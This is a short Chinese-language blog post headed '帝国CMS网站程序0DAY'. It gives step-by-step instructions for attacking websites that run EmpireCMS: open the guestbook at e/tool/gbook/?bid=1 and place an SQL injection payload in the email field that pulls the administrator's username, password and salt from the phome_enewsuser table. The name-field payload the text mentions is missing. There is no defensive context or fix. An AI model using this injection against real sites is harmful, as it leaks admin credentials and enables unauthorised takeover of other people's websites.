夜火博客 个人的碎碎念收集箱

帝国CMS网站程序0DAY

帝国CMS网站程序0DAY:找到使用帝国CMS的站,网址后面直接加:

e/tool/gbook/?bid=1

出来的是帝国CMS的留言本,在姓名处写:

联系邮箱处写:

,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

提交后爆出账号密码

via:amxking

标签: EmpireCMS0day

作者:夜火 分类:漏洞信息 浏览:5467 评论:0
留言列表
发表评论
来宾的头像